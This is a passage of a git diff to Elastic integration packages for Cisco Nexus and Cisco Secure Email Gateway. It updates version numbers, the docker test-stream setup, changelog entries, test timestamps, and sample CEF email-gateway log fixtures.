VSHD_SYSLOG_CONFIG_I, DETECT_MULTIPLE_PEERS, UPDOWN, CFGWRITE_STARTED, LINEPROTO MNEMONIC. diff --git a/packages/cisco_nexus/manifest.yml b/packages/cisco_nexus/manifest.yml index 90909fed993..8aebfffc88b 100644 --- a/packages/cisco_nexus/manifest.yml +++ b/packages/cisco_nexus/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_nexus title: Cisco Nexus -version: "1.0.1" +version: "1.1.1" description: Collect logs from Cisco Nexus with Elastic Agent. type: integration categories: diff --git a/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml b/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml index 6e22e6f9d1c..48ee8a1c5e2 100644 --- a/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml +++ b/packages/cisco_secure_email_gateway/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/*.s /var/log/" cisco_secure_email_gateway-log-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9519 -p=tcp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9519 -p=tcp /sample_logs/log.log cisco_secure_email_gateway-log-udp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9520 -p=udp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9520 -p=udp /sample_logs/log.log diff --git a/packages/cisco_secure_email_gateway/changelog.yml b/packages/cisco_secure_email_gateway/changelog.yml index c748c517dd7..72c203bf1e5 100644 --- a/packages/cisco_secure_email_gateway/changelog.yml +++ b/packages/cisco_secure_email_gateway/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.23.2" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9571 +- version: "1.23.1" + changes: + - description: Improve extraction and parsing of fields for consolidated events. + type: bugfix + link: https://github.com/elastic/integrations/pull/9474 +- version: "1.23.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.22.2" + changes: + - description: Fix grok if hostname appears before category.name + type: bugfix + link: https://github.com/elastic/integrations/pull/9160 - version: "1.22.1" changes: - description: Changed owners diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json index 69365de924a..eb376cd2444 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-anti-spam.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "case_id": "72324", @@ -32,7 +32,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "case_id": "15703", @@ -64,7 +64,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "case_id": "15703", diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json index 8c1bf52f747..9dfe1999b7e 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-antivirus.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CLEAN", @@ -38,7 +38,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Encrypted", @@ -78,7 +78,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/Phish-O", @@ -119,7 +119,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/MalPE-HB", @@ -160,7 +160,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/MalPE-FL", @@ -201,7 +201,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "CXmail/MalPE-AC", @@ -242,7 +242,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Mal/DrodRar-AIC", @@ -283,7 +283,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Troj/MSIL-TAR", @@ -324,7 +324,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "Max Files Exceeded", @@ -362,7 +362,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "antivirus_result": "timed out on message", diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log index 8e990d26a7d..381e37633b9 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-consolidated-event.log @@ -11,7 +11,10 @@ <14>Jun 12 14:01:33 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=5181473 ESAICID=17267358 ESADCID=3036000 endTime=Mon Jun 12 14:01:31 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=1.128.3.4 ESAFriendlyFrom=jean sistin ESAGMVerdict=NEGATIVE startTime=Mon Jun 12 14:01:27 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=jsistin@gmail.com cs1Label=MailPolicy cs1=Test quarantaine utilisateur cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=3078 ESAOFVerdict=NEGATIVE duser=fpenigaud@exaprobe.com ESAHeloDomain=mail-oi1-f182.google.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=3.4 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'jsistin@gmail.com'}} sourceHostName=mail-oi1-f182.google.com ESASenderGroup=ACCEPTLIST sourceAddress=1.128.3.4 msg='test url' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH <14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=E7DEF468022C4EB09683-9A331A42E1F7 ESAMID=54376810 ESAICID=43587623 endTime=Tue Jul 4 06:21:54 2023 ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAAttachmentDetails={'meeting.ics': {'AMP': {'Verdict': 'FILE UNKNOWN', 'fileHash': '17ae79446b4ec3baf161704831970aac49457d32935c6383c2a45aed136a99df'}, 'BodyScanner': {}}} ESAFriendlyFrom=River ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 16:12:44 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=river@this.example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=New Zealand ESAMFVerdict=MATCH act=DQ ESAFinalActionDetails=Message held temporarily in Delay Quarantine cs4Label=ExternalMsgID cs4='<2403354681.734500.1688449973515.mail.lion@example.com>' ESAMsgSize=18675 ESAOFVerdict=NEGATIVE duser=smith@example.com ESAHeloDomain=vm-lion.dmz ESAHeloIP=89.160.20.128 cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'river@this.example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@vm-lion.dmz'}} sourceHostName=company.example.com sourceAddress=89.160.20.128 msg='Accept: Cisco - SOLUTIONS' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=FA_PENDING ESAASVerdict=NEGATIVE ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH <14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=30543A3AB9E54FA8AAC1-FB812C95028D ESAMID=238746 ESAICID=435897324 ESADCID=34809573 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.142 ESAFriendlyFrom=Will ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 15:14:29 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=irobot@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='' ESAMsgSize=12312 ESAOFVerdict=NEGATIVE duser=alfombra@example.com ESAHeloDomain=mail-q6by9-a42.google.com ESAHeloIP=81.2.69.192 cfp1Label=SBRSScore cfp1=2.7 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'irobot@example.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@mail-q6by9-a42.google.com'}} sourceHostName=mail-q6by9-a42.google.com ESASenderGroup=ACCEPTLIST sourceAddress=81.2.69.192 msg='IE : Crayons' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH -<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg=\"Totally not suspicious email subject\" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH +<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg="Totally not suspicious email subject" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH +<14>Jul 04 06:21:54 test.hostname.co consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|14.3.0-032|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4FEF3A4372664BCCB404-20EE1767D434 ESAMID=786324 ESAICID=35635425 ESADCID=970897 endTime=Tue Jul 4 06:21:54 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Beaches ESAGMVerdict=NEGATIVE startTime=Tue Jul 4 14:42:34 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=westinghouse-thoreau\\=example.com@example.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=NZ ESAMFVerdict=MATCH act=QUARANTINED ESAFinalActionDetails=To SPAM cs4Label=ExternalMsgID cs4='<490b2a15fa4742331779cdaa4e@example.com>' ESAMsgSize=20668 ESAOFVerdict=NEGATIVE duser=thoreau@example.com ESAHeloDomain=example.com ESAHeloIP=89.160.20.112 ESAReplyTo=lane@example.com cfp1Label=SBRSScore cfp1=None ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'westinghouse-thoreau=example.com@example.com'}, 'helo': {'result': 'Pass', 'sender': 'postmaster@example.com'}} sourceHostName=example.com sourceAddress=89.160.20.112 msg="Totally not suspicious email subject" ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=SUSPECT ESAAVVerdict=NOT_EVALUATED ESACFVerdict=NO_MATCH Sep 16 16:56:06 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|15.0.0-104|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=2348764 ESAICID=435786234 ESADCID=23876232 end=Tue Sep 16 16:56:06 2023 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED dvc=81.2.69.144 ESAFriendlyFrom=Bouncy Castle - No Reply ESAGMVerdict=NEGATIVE start=Tue Sep 16 16:56:04 2023 deviceInboundInterface=IncomingMail deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=0101016d24913de4eb-28ea32e6-4dad-4943-b6f7-ef0dddbb875d-000000@bounce.com cs1Label=MailPolicy cs1=Exception_support cs2Label=SenderCountry cs2=United States ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=3518 ESAOFVerdict=NOT_EVALUATED duser=support@example.com ESAHeloDomain=smtp-out.us-west-1.amazon.com ESAHeloIP=216.160.83.56 cfp1Label=SBRSScore cfp1=3.5 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Favorable ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': '0101016d24913de4eb-28ea32e6-4dad-4943-b6f7-ef0dddbb875d-000000@bounce.com'}, 'helo': {'result': 'None', 'sender': 'postmaster@smtp-out.us-west-1.amazon.com'}} shost=smtp-out.us-west-1.amazon.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='Alert - wireless - APs came up' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAAMPVerdict=SKIPPED ESAASVerdict=NEGATIVE ESAAVVerdict=NEGATIVE ESACFVerdict=NOT_EVALUATED Sep 16 16:56:06 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|15.0.0-104|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=2348764 ESAICID=435786234 ESADCID=23876232 ESAAMPVerdict=SKIPPED ESAAVVerdict=NEGATIVE ESAFriendlyFrom=Bouncy Castle duser=support@example.com ESAHeloDomain=smtp-out.us-west-1.amazon.com ESAHeloIP=216.160.83.56 sourceHostName=example.com ESASenderGroup=UNKNOWNLIST sourceAddress=89.160.20.112 msg='Automatic reply: Your weekend reading from Bouncy Castle' ESAURLDetails={'https://example.com': {'WbrsScore': 3.0}, 'http://www.example.com': {'WbrsScore': 8.9000000000000004}, 'http://schemas.microsoft.com/office': {'WbrsScore': 9.0}} Sep 17 16:56:06 consolidated_event: CEF:0|Cisco|C100V Email Security Virtual Appliance|15.0.0-104|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235746AE34E6DD44EB8-CE101C994AA5 ESAMID=2348764 ESAICID=435786234 ESADCID=23876232 ESAAMPVerdict=NOT_EVALUATED ESAAVVerdict=NEGATIVE ESAFriendlyFrom="Castle. B (Bouncy Castle)" suser=bouncy@castle.com duser=support@example.com ESAHeloDomain=smtp-out.us-west-1.amazon.com ESAHeloIP=216.160.83.56 sourceHostName=unknown ESASenderGroup=RELAYLIST sourceAddress=89.160.20.112 msg='Testing' +<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873886 ESAICID=6274404 ESADCID=1980231 ESAAMPVerdict=NOT_EVALUATED ESAASVerdict=NOT_EVALUATED ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:30 2024 ESADLPVerdict=NO_TRIGGER dvc=81.2.69.144 ESAAttachmentDetails={'image.png': {'BodyScanner': {}}, 'GO EYEWEAR v4.pdf': {'BodyScanner': {}}} ESAFriendlyFrom=Carlos Alberto Cueto ESAGMVerdict=NOT_EVALUATED start=Thu Feb 29 13:24:27 2024 deviceOutboundInterface=MailFlow-Ext deviceDirection=1 ESAMailFlowPolicy=RELAY suser=lclient17@externos.client.test cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=not enabled ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='' ESAMsgSize=2380198 ESAOFVerdict=NOT_EVALUATED duser=teresa.faria@goeyeweargroup.com ESAHeloDomain=EUR05-DB8-obe.outbound.protection.outlook.com ESAHeloIP=1.128.3.4 cfp1Label=SBRSScore cfp1=not enabled shost=mail-db8eur05lp2105.outbound.protection.outlook.com ESASenderGroup=RELAY_O365 src=216.160.83.56 msg='Presupuesto Go Eyewear' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'https://www.client.test/': {'WbrsScore': 3.0}, 'https://www.client.test/siente-la-inspiracion': {'WbrsScore': 3.0}, 'http://www.client.test/': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}, 'www.client.test': {'WbrsScore': 3.0, 'AttachmentWithUrl': 'GO EYEWEAR v4.pdf'}} +<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873887 ESAICID=6274403 ESADCID=1980232 ESAAMPVerdict=SKIPPED ESAASVerdict=BULK_MAIL ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:31 2024 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED ESADMARCVerdict=pass dvc=1.128.3.4 ESAFriendlyFrom=\"Zander, Petra Petra.Zander at druseidt.de\" ESAGMVerdict=POSITIVE start=Thu Feb 29 13:24:22 2024 deviceInboundInterface=MailFlow deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=Germany ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='<588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local>' ESAMsgSize=53966 ESAOFVerdict=NEGATIVE duser=matelec@client.test ESAHeloDomain=gr1.mta.exacttarget.com ESAHeloIP=89.160.20.128 ESAReplyTo=Petra.Zander@druseidt.de cfp1Label=SBRSScore cfp1=5.2 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}} shost=gr1.mta.exacttarget.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='AW: Important information for your participation as an exhibitor' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 